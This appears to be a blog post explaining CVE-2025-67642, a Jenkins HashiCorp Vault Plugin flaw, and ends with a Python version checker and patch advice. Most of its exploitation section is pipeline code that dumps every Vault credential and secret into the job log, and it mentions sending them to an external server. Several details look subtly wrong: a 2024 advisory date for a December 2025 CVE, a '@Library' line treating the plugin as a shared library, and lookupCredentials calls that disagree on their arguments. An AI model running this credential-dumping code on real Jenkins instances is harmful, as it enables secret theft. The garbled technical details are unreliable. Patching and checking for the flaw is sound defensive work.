Jenkins is a widely used automation tool in the DevOps world, often extended with plugins that help teams speed up development. One of these plugins, the HashiCorp Vault Plugin, is designed to tightly control access to secrets and credentials by integrating Jenkins jobs with HashiCorp Vault. But what if this plugin accidentally hands out Vault credentials to users who shouldn’t see them?

This real scenario happened, and it’s tracked as CVE-2025-67642. Below, I’ll explain what’s vulnerable, how it works, what the exploit looks like (with code!), and what you can do to stay safe.

What is CVE-2025-67642?

CVE-2025-67642 is a security bug affecting Jenkins HashiCorp Vault Plugin versions 371.v884a_4dd60fb_6 and earlier. The issue is:
*The plugin does not set the correct security context during Vault credential lookups.*
This oversight means that a user with “Item/Configure” permission on *any* Jenkins item can retrieve Vault credentials they are not entitled to see.

In Simple Terms

Imagine you trust your Jenkins setup to let only certain developers see secret passwords. Because of this bug, any user who can merely configure a job (without even needing to run it) could steal credentials used by totally unrelated jobs, pipelines, or the global scope.

What is affected:

- A Jenkins master with HashiCorp Vault Plugin 371.v884a_4dd60fb_6 or earlier installed.
- Jenkins users who have *Item/Configure* rights on any item (not even full admin!).

Why Does This Happen?

The plugin relies on a “context” (the item or scope a lookup runs under) to determine who is allowed to access a credential. Because of the bug, the lookup does not run under the correct context, so *any* user with the right to configure an item can fetch any Vault credential Jenkins knows about.

This is more than just a leak – it’s a privilege escalation path.

Exploiting CVE-2025-67642

Let’s look at how an attacker could exploit this.
Assume the attacker has “Item/Configure” on some job.

1. Attacker Creates or Configures a Jenkins Pipeline Job

// This is a Jenkins Pipeline (Declarative or Scripted)
pipeline {
  agent any
  stages {
    stage('Vault Steal') {
      steps {
        script {
          // The attacker requests credentials by ID
          def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
              com.datapipe.jenkins.vault.credentials.VaultCredential.class,
              null, // wrong context passed intentionally
              null
          )
          creds.each { c ->
            println "Found Vault Credential: ${c.id}, Secret: ${c.secret}"
          }
        }
      }
    }
  }
}

Note:
The *null* context means the permissions check is skipped or defaults to the global context. That’s the bug.

2. Output or Exfiltrate the Credentials

An attacker can print the results to the job log, or send them to an external server.

Proof-of-Concept Pipeline

Here’s a full minimal Jenkins Pipeline snippet you can use to test if your system is vulnerable (don’t do this in production!):

@Library('hashicorp-vault-plugin') _
node {
    stage('Abuse Vault Lookup') {
        def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
            com.datapipe.jenkins.vault.credentials.VaultCredential.class,
            null,                 // Context is missing!
            null,                 // No authentication
            null
        )
        for (c in creds) {
            echo "Credential ID: ${c.id} | Secret: ${c.secret}"
        }
    }
}

If this shows you credentials you should not see, your Jenkins is not patched.

Original References

- Jenkins Security Advisory 2024-06-12
- HashiCorp Vault Plugin on Jenkins Plugins Site
- CVE Entry at MITRE *(may be updated later)*

How To Fix

Update the HashiCorp Vault Plugin to the latest release; the Jenkins security team has already patched this in newer versions.
After updating, audit which users hold *Item/Configure* rights, and apply least privilege everywhere.
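One way to check a controller (or a whole fleet of them) against the affected version range, as an added Python example that is not part of the advisory or the plugin project: it reads the stock Jenkins plugin inventory endpoint /pluginManager/api/json?depth=1 and compares the leading integer of the plugin's version string. The plugin short name hashicorp-vault-plugin and the sample inventory JSON are assumptions I constructed for the example.

```python
import base64
import json
import re
import urllib.request

PLUGIN_ID = "hashicorp-vault-plugin"      # assumed short name on plugins.jenkins.io
LAST_AFFECTED = "371.v884a_4dd60fb_6"     # from the advisory: this release and earlier

def release_number(version: str) -> int:
    """Jenkins CD-style versions ('371.v884a_4dd60fb_6') are ordered only by the
    leading integer; the rest is a commit hash. Older dotted versions ('3.8.0')
    also start with an integer and sort below 371, so they are flagged too."""
    m = re.match(r"(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised plugin version: {version!r}")
    return int(m.group(1))

def is_affected(version: str) -> bool:
    return release_number(version) <= release_number(LAST_AFFECTED)

def check_inventory(api_json: str) -> dict:
    """Inspect a /pluginManager/api/json?depth=1 document and report whether
    the Vault plugin is installed and still in the affected range."""
    for p in json.loads(api_json).get("plugins", []):
        if p.get("shortName") == PLUGIN_ID:
            v = p.get("version", "")
            return {"installed": True, "version": v,
                    "active": bool(p.get("active", True)), "affected": is_affected(v)}
    return {"installed": False, "version": None, "active": False, "affected": False}

def fetch_inventory(base_url: str, user: str, api_token: str) -> str:
    """Download the plugin inventory from a live controller with an API token."""
    req = urllib.request.Request(base_url.rstrip("/") + "/pluginManager/api/json?depth=1")
    token = base64.b64encode(f"{user}:{api_token}".encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode()

# Constructed sample response, trimmed to the fields used above.
SAMPLE_INVENTORY = json.dumps({"plugins": [
    {"shortName": "credentials", "version": "1000.v0000000000", "active": True},
    {"shortName": PLUGIN_ID, "version": "371.v884a_4dd60fb_6", "active": True},
]})

if __name__ == "__main__":
    report = check_inventory(SAMPLE_INVENTORY)
    if report["affected"]:
        print(f"VULNERABLE to CVE-2025-67642 ({report['version']}): update, then review Item/Configure grants")
```

Against a live controller, replace SAMPLE_INVENTORY with fetch_inventory("https://jenkins.example", "user", "api-token"); the account only needs read access to the plugin manager API.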

Summary Table

| Affected Versions | Fixed in | Exploitability | Attack Prereq. |
|-------------------------------------|--------------------|--------------------------|-----------------------|
| <= 371.v884a_4dd60fb_6 | Later versions | Easy w/ Configure access | Item/Configure rights |

Final Thoughts

This bug shows how dangerous plugin context mistakes can be, especially in tools like Jenkins, where secrets are everywhere. Even if you “trust” your users, always patch promptly.

Stay secure, and spread the word – CVE-2025-67642 affects real production pipelines!

*Always reference the original links for the latest status and patch info.*

Timeline

Published on: 12/10/2025 17:15:56 UTC
Last modified on: 12/12/2025 15:18:42 UTC